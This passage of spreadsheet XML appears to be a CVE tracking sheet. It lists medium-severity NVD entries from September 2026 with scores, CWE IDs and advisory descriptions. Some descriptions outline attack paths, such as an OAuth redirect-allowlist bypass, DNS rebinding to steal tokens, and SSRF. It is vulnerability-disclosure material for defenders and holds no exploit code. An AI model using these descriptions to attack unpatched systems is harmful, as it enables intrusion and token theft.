      <c r="O837" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P837" s="5" t="inlineStr"/>
      <c r="Q837" s="5" t="inlineStr">
        <is>
          <t>CWE-1287</t>
        </is>
      </c>
      <c r="R837" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in WTV676-HB6035 Web Interface (All versions &lt; V3.94), WTV776-HB6035 Web Interface (All versions &lt; V4.17). Affected devices do not properly validate input received from backend services.
This could allow an unauthenticated remote attacker to force the device into protection mode, which results in losing remote connectivity functions (Web Access).</t>
        </is>
      </c>
      <c r="S837" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89207</t>
        </is>
      </c>
    </row>
    <row r="838">
      <c r="A838" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B838" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C838" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90593</t>
        </is>
      </c>
      <c r="D838" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E838" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F838" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G838" s="5" t="inlineStr"/>
      <c r="H838" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I838" s="5" t="inlineStr"/>
      <c r="J838" s="5" t="inlineStr"/>
      <c r="K838" s="5" t="inlineStr"/>
      <c r="L838" s="5" t="inlineStr"/>
      <c r="M838" s="5" t="inlineStr"/>
      <c r="N838" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O838" s="5" t="inlineStr">
        <is>
          <t>2026-09-13</t>
        </is>
      </c>
      <c r="P838" s="5" t="inlineStr"/>
      <c r="Q838" s="5" t="inlineStr">
        <is>
          <t>CWE-189, CWE-190</t>
        </is>
      </c>
      <c r="R838" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in embedded-graphics up to 0.8.2. This affects the function ImageRaw::draw_sub_image of the file src/image/image_raw.rs. Executing a manipulation of the argument width can lead to integer overflow. The attack may be launched remotely. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="S838" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90593</t>
        </is>
      </c>
    </row>
    <row r="839">
      <c r="A839" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B839" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C839" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90603</t>
        </is>
      </c>
      <c r="D839" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E839" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F839" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G839" s="5" t="inlineStr"/>
      <c r="H839" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I839" s="5" t="inlineStr"/>
      <c r="J839" s="5" t="inlineStr"/>
      <c r="K839" s="5" t="inlineStr"/>
      <c r="L839" s="5" t="inlineStr"/>
      <c r="M839" s="5" t="inlineStr"/>
      <c r="N839" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O839" s="5" t="inlineStr">
        <is>
          <t>2026-09-13</t>
        </is>
      </c>
      <c r="P839" s="5" t="inlineStr"/>
      <c r="Q839" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-434</t>
        </is>
      </c>
      <c r="R839" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in Anil-matcha Open-Generative-AI up to 1.0.11/2.0.0. Affected by this issue is some unknown functionality of the file /api/upload-binary of the component S3 Upload. Such manipulation of the argument x-proxy-target-url leads to unrestricted upload. The attack may be launched remotely. The name of the patch is f013270957f75e439eaf97eb2a93decb32a4543e. Applying a patch is advised to resolve this issue.</t>
        </is>
      </c>
      <c r="S839" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90603</t>
        </is>
      </c>
    </row>
    <row r="840">
      <c r="A840" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B840" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C840" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91198</t>
        </is>
      </c>
      <c r="D840" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E840" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F840" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G840" s="5" t="inlineStr"/>
      <c r="H840" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I840" s="5" t="inlineStr"/>
      <c r="J840" s="5" t="inlineStr"/>
      <c r="K840" s="5" t="inlineStr"/>
      <c r="L840" s="5" t="inlineStr"/>
      <c r="M840" s="5" t="inlineStr"/>
      <c r="N840" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O840" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P840" s="5" t="inlineStr"/>
      <c r="Q840" s="5" t="inlineStr">
        <is>
          <t>CWE-201</t>
        </is>
      </c>
      <c r="R840" s="5" t="inlineStr">
        <is>
          <t>GrowthBook through 5.0.1 returns unredacted fact table definitions including raw warehouse SQL in payloads served by unauthenticated public report and experiment endpoints. Attackers with knowledge of a publicly shared report or experiment identifier can read internal data warehouse query text, schema, table names, filter values and datasource identifiers.</t>
        </is>
      </c>
      <c r="S840" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91198</t>
        </is>
      </c>
    </row>
    <row r="841">
      <c r="A841" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B841" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C841" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92215</t>
        </is>
      </c>
      <c r="D841" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E841" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F841" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G841" s="5" t="inlineStr"/>
      <c r="H841" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I841" s="5" t="inlineStr"/>
      <c r="J841" s="5" t="inlineStr"/>
      <c r="K841" s="5" t="inlineStr"/>
      <c r="L841" s="5" t="inlineStr"/>
      <c r="M841" s="5" t="inlineStr"/>
      <c r="N841" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O841" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P841" s="5" t="inlineStr"/>
      <c r="Q841" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R841" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in a2ui-project a2ui up to 0.10.7. Affected by this vulnerability is the function httpx.get of the file agent_sdks/python/a2ui_agent/src/a2ui/extensions/file_resolve/file_resolver.py of the component FileResolver. The manipulation leads to server-side request forgery. It is possible to initiate the attack remotely. The identifier of the patch is 2bb8423060308bbdea8ba468dabed4fc256d18ea. To fix this issue, it is recommended to deploy a patch.</t>
        </is>
      </c>
      <c r="S841" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92215</t>
        </is>
      </c>
    </row>
    <row r="842">
      <c r="A842" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B842" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C842" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92220</t>
        </is>
      </c>
      <c r="D842" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E842" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F842" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G842" s="5" t="inlineStr"/>
      <c r="H842" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I842" s="5" t="inlineStr"/>
      <c r="J842" s="5" t="inlineStr"/>
      <c r="K842" s="5" t="inlineStr"/>
      <c r="L842" s="5" t="inlineStr"/>
      <c r="M842" s="5" t="inlineStr"/>
      <c r="N842" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O842" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P842" s="5" t="inlineStr"/>
      <c r="Q842" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-404</t>
        </is>
      </c>
      <c r="R842" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in vllm-project vLLM 0.26.0/0.27.0. Affected is the function MoRIIOConnectorScheduler.request_finished/MoRIIOConnectorWorker.get_finished/MoRIIOWrapper._handle_release_message of the file vllm/distributed/kv_transfer/kv_connector/v1/moriio/moriio_connector.py of the component MoRIIO Acknowledgement Handler. Performing a manipulation of the argument request_id/kv_transfer_params results in resource consumption. It is possible to initiate the attack remotely. The project was informed of the problem early through a pull request but has not reacted yet.</t>
        </is>
      </c>
      <c r="S842" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92220</t>
        </is>
      </c>
    </row>
    <row r="843">
      <c r="A843" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B843" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C843" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92362</t>
        </is>
      </c>
      <c r="D843" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E843" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F843" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G843" s="5" t="inlineStr"/>
      <c r="H843" s="5" t="inlineStr"/>
      <c r="I843" s="5" t="inlineStr"/>
      <c r="J843" s="5" t="inlineStr"/>
      <c r="K843" s="5" t="inlineStr"/>
      <c r="L843" s="5" t="inlineStr"/>
      <c r="M843" s="5" t="inlineStr"/>
      <c r="N843" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O843" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P843" s="5" t="inlineStr"/>
      <c r="Q843" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-404</t>
        </is>
      </c>
      <c r="R843" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in ag-ui-protocol ag-ui 1.0. This impacts an unknown function of the file crates/ag-ui-client/src/sse.rs of the component SSE Frame Parser. Performing a manipulation results in resource consumption. The attack is possible to be carried out remotely. The pull request to fix this issue awaits acceptance.</t>
        </is>
      </c>
      <c r="S843" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92362</t>
        </is>
      </c>
    </row>
    <row r="844">
      <c r="A844" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B844" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C844" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92401</t>
        </is>
      </c>
      <c r="D844" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E844" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F844" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G844" s="5" t="inlineStr"/>
      <c r="H844" s="5" t="inlineStr"/>
      <c r="I844" s="5" t="inlineStr"/>
      <c r="J844" s="5" t="inlineStr"/>
      <c r="K844" s="5" t="inlineStr"/>
      <c r="L844" s="5" t="inlineStr"/>
      <c r="M844" s="5" t="inlineStr"/>
      <c r="N844" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O844" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P844" s="5" t="inlineStr"/>
      <c r="Q844" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R844" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in ChangeWeDer crm up to c07bd4c97141521af6475034bc58523beed51bbd. This vulnerability affects the function top.upstudy.crm.utils.LoginUserUtil.releaseUserIdFromCookie. The manipulation leads to improper authentication. The attack can be initiated remotely. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="S844" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92401</t>
        </is>
      </c>
    </row>
    <row r="845">
      <c r="A845" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B845" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C845" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12985</t>
        </is>
      </c>
      <c r="D845" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E845" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F845" s="5" t="inlineStr">
        <is>
          <t>responsibledisclosure@mattermost.com</t>
        </is>
      </c>
      <c r="G845" s="5" t="inlineStr"/>
      <c r="H845" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I845" s="5" t="inlineStr"/>
      <c r="J845" s="5" t="inlineStr"/>
      <c r="K845" s="5" t="inlineStr"/>
      <c r="L845" s="5" t="inlineStr"/>
      <c r="M845" s="5" t="inlineStr"/>
      <c r="N845" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O845" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P845" s="5" t="inlineStr"/>
      <c r="Q845" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="R845" s="5" t="inlineStr">
        <is>
          <t>Mattermost versions 11.9.x &lt;= 11.9.0, 11.8.x &lt;= 11.8.4, 11.7.x &lt;= 11.7.7 Mattermost failed to validate Dynamic Client Registration redirect URIs by URL component (matching glob patterns against the raw URI string instead) which allows a remote unauthenticated attacker to register an OAuth client with an attacker-controlled callback host that bypasses the configured redirect URI allowlist via a crafted redirect URI that places an allowlisted host/path suffix inside the query string.. Mattermost Advisory ID: MMSA-2026-00700</t>
        </is>
      </c>
      <c r="S845" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12985</t>
        </is>
      </c>
    </row>
    <row r="846">
      <c r="A846" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B846" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C846" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13265</t>
        </is>
      </c>
      <c r="D846" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E846" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F846" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G846" s="5" t="inlineStr"/>
      <c r="H846" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I846" s="5" t="inlineStr"/>
      <c r="J846" s="5" t="inlineStr"/>
      <c r="K846" s="5" t="inlineStr"/>
      <c r="L846" s="5" t="inlineStr"/>
      <c r="M846" s="5" t="inlineStr"/>
      <c r="N846" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O846" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P846" s="5" t="inlineStr"/>
      <c r="Q846" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="R846" s="5" t="inlineStr">
        <is>
          <t>IBM MQ 9.1.0.0 through 9.1.0.37 LTS, 9.2.0.0 through 9.2.0.43 LTS, 9.3.0.0 through 9.3.0.41 LTS, 9.3.0.0 through 9.3.5.1 CD, 9.4.0.0 through 9.4.0.25 LTS, 9.4.0.0 through 9.4.5.1 CD, and 10.0.0.0 could allow an authenticated attacker with MFT publish authority to obtain sensitive information or cause a denial of service due to XML external entity injection in the mqweb MFT REST API.</t>
        </is>
      </c>
      <c r="S846" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13265</t>
        </is>
      </c>
    </row>
    <row r="847">
      <c r="A847" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B847" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C847" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20248</t>
        </is>
      </c>
      <c r="D847" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E847" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F847" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G847" s="5" t="inlineStr"/>
      <c r="H847" s="5" t="inlineStr"/>
      <c r="I847" s="5" t="inlineStr"/>
      <c r="J847" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K847" s="5" t="inlineStr"/>
      <c r="L847" s="5" t="inlineStr"/>
      <c r="M847" s="5" t="inlineStr"/>
      <c r="N847" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O847" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P847" s="5" t="inlineStr"/>
      <c r="Q847" s="5" t="inlineStr">
        <is>
          <t>CWE-195</t>
        </is>
      </c>
      <c r="R847" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the DNS over TCP implementation of Cisco Secure Firewall Adaptive Security Appliance (ASA) Software and Cisco Secure Firewall Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause the TCP DNS&amp;nbsp;response handler to unexpectedly restart, causing the device to reload.
This vulnerability is due to a logic error when parsing a DNS query and tracking the size of the incoming buffers. An attacker could exploit this vulnerability by formatting a crafted reply to a DNS query sent from the targeted device. A successful exploit could allow the attacker to cause the device to reload, causing a denial of service (DoS) condition.
Note: The attacker must be able to respond to DNS queries from the device, either by controlling the DNS service or through a machine-in-the-middle attack.</t>
        </is>
      </c>
      <c r="S847" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20248</t>
        </is>
      </c>
    </row>
    <row r="848">
      <c r="A848" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B848" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C848" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55837</t>
        </is>
      </c>
      <c r="D848" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E848" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F848" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G848" s="5" t="inlineStr"/>
      <c r="H848" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I848" s="5" t="inlineStr"/>
      <c r="J848" s="5" t="inlineStr"/>
      <c r="K848" s="5" t="inlineStr"/>
      <c r="L848" s="5" t="inlineStr"/>
      <c r="M848" s="5" t="inlineStr"/>
      <c r="N848" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O848" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P848" s="5" t="inlineStr"/>
      <c r="Q848" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-306, CWE-346</t>
        </is>
      </c>
      <c r="R848" s="5" t="inlineStr">
        <is>
          <t>dbt-mcp is a Model Context Protocol server for interacting with dbt. Prior to 1.20.0, the local OAuth helper in src/dbt_mcp/oauth/fastapi_app.py exposes GET /dbt_platform_context without authentication or Host validation after a user completes the dbt Platform OAuth flow. The endpoint returns the full DbtPlatformContext, including access_token and refresh_token values persisted by the context manager, to any process that can reach 127.0.0.1:6785. The absence of TrustedHostMiddleware allows a remote attacker to use DNS rebinding against a victim's browser because the helper accepts arbitrary Host headers, while a co-located process can request the endpoint directly. The stolen tokens provide immediate dbt Platform API access as the victim and persistent access through the refresh token, allowing access to or modification of projects, jobs, environment secrets, and related account data. This issue is fixed in version 1.20.0.</t>
        </is>
      </c>
      <c r="S848" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55837</t>
        </is>
      </c>
    </row>
    <row r="849">
      <c r="A849" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B849" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C849" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64684</t>
        </is>
      </c>
      <c r="D849" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E849" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F849" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G849" s="5" t="inlineStr"/>
      <c r="H849" s="5" t="inlineStr"/>
      <c r="I849" s="5" t="inlineStr"/>
      <c r="J849" s="5" t="inlineStr"/>
      <c r="K849" s="5" t="inlineStr"/>
      <c r="L849" s="5" t="inlineStr"/>
      <c r="M849" s="5" t="inlineStr"/>
      <c r="N849" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O849" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P849" s="5" t="inlineStr"/>
      <c r="Q849" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R849" s="5" t="inlineStr">
        <is>
          <t>RMCP is an official Rust SDK for the Model Context Protocol. Prior to 2.1.0, the rmcp crate's StreamableHttpClientTransport in crates/rmcp/src/transport/common/reqwest/streamable_http_client.rs builds its default_http_client with reqwest's automatic redirect policy and applies caller-supplied values from StreamableHttpClientTransportConfig.custom_headers without marking them as sensitive. When a malicious or compromised MCP endpoint returns a cross-origin 307 or 308 redirect, reqwest follows the redirect and apply_custom_headers causes custom API keys or authentication tokens to be replayed to the new origin, where an attacker can capture and reuse them. The separate auth_header path is not affected because it uses the standard Authorization header, which reqwest strips on cross-origin redirects. This issue is fixed in version 2.1.0.</t>
        </is>
      </c>
      <c r="S849" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64684</t>
        </is>
      </c>
    </row>
    <row r="850">
      <c r="A850" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B850" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C850" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69490</t>
        </is>
      </c>
      <c r="D850" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E850" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F850" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G850" s="5" t="inlineStr"/>
      <c r="H850" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I850" s="5" t="inlineStr"/>
      <c r="J850" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K850"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850" s="5" t="inlineStr"/>
      <c r="M850" s="5" t="inlineStr"/>
      <c r="N850" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O850" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P850" s="5" t="inlineStr"/>
      <c r="Q850" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R850" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows USB Mass Storage Class Driver allows an unauthorized attacker to elevate privileges with a physical attack.</t>
        </is>
      </c>
      <c r="S850" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69490</t>
        </is>
      </c>
    </row>
    <row r="851">
      <c r="A851" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B851" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C851" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77401</t>
        </is>
      </c>
      <c r="D851" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E851" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F851" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G851" s="5" t="inlineStr"/>
      <c r="H851" s="5" t="inlineStr"/>
      <c r="I851" s="5" t="inlineStr"/>
      <c r="J851" s="5" t="inlineStr"/>
      <c r="K851" s="5" t="inlineStr"/>
      <c r="L851" s="5" t="inlineStr"/>
      <c r="M851" s="5" t="inlineStr"/>
      <c r="N851" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O851" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P851" s="5" t="inlineStr"/>
      <c r="Q851" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="R851" s="5" t="inlineStr">
        <is>
          <t>Zope AccessControl provides a general security framework for use in Zope. Prior to 7.4, applications that allow untrusted users to create and execute AccessControl-controlled Python code do not safely guard str.format and str.format_map when those methods are reached through a str subclass. In both ImplPython.py and cAccessControl.c, Python formatting can recursively access attributes and subscriptions using unrestricted getattr and getitem behavior instead of the policy-restricted getattr and getitem operations. A controlled format string can therefore disclose objects reachable from values available to the formatting operation. This issue is fixed in version 7.4.</t>
        </is>
      </c>
      <c r="S851" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77401</t>
        </is>
      </c>
    </row>
    <row r="852">
      <c r="A852" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B852" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C852" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77892</t>
        </is>
      </c>
      <c r="D852" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E852" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F852" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G852" s="5" t="inlineStr"/>
      <c r="H852" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I852" s="5" t="inlineStr"/>
      <c r="J852" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K852"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852" s="5" t="inlineStr"/>
      <c r="M852" s="5" t="inlineStr"/>
      <c r="N852" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O852" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P852" s="5" t="inlineStr"/>
      <c r="Q852" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="R852" s="5" t="inlineStr">
        <is>
          <t>No cwe for this issue in Windows Boot Manager allows an unauthorized attacker to elevate privileges with a physical attack.</t>
        </is>
      </c>
      <c r="S852" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77892</t>
        </is>
      </c>
    </row>
    <row r="853">
      <c r="A853" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B853" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C853" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81052</t>
        </is>
      </c>
      <c r="D853" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E853" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F853" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G853" s="5" t="inlineStr"/>
      <c r="H853" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I853" s="5" t="inlineStr"/>
      <c r="J853" s="5" t="inlineStr"/>
      <c r="K853" s="5" t="inlineStr">
        <is>
